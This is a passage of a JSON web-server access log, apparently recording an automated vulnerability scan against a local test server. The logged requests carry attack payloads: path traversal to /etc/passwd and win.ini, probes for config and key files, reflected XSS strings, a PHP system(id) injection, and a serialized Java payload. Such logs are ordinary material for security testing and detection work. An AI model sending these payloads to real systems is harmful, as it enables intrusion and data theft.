+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.258","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /keycloak.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.231","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/production.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.080","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.inc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ADSearch.cc?methodToCall=search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"SPOOLDIR=test\x22.system(id).\x22&recheck=Recheck","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/297MTyjyoU9hpLwfgSXmorm1NeA HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?action=login.index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.071","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"127.0.0.1/index.php?action=login.index", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.253","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.250","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php-info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?dev HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /localhost.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /production.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.237","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/__swagger__/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.241","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PMUser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.253","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vropspluginui/rest/services/getstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/tmui/login/welcome.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"DEBUG /Foobar-debug.aspx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"DEBUG", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.252","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /karma.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.078","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /alps/profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.078","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/_swagger_/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configprops HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_notes/dwsync.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mgmt/tm/sys/management-ip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url=http://127.0.0.1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xml/User/User.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0ArO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\x0D\x0AgetUnsavedChanges\x0D\x0ArO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAKmM5djhoOGdzbXB2OGMxcWcwN2gwdHo0dGh3NWM0cTE4My5vYXN0LmZ1bnQAAHEAfgAFdAAFaHR0cHNweHQAGWh0dHBzOi8vdGVzdC5qZXhib3NzLmluZm94\x0D\x0ArO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3C%3E//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/43 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-resources/restservices/v2/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apimanui/api-manager HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gemfile.lock HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/123contactform-for-wordpress/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /translations/en.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/44 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__clockwork/latest HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger_doc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 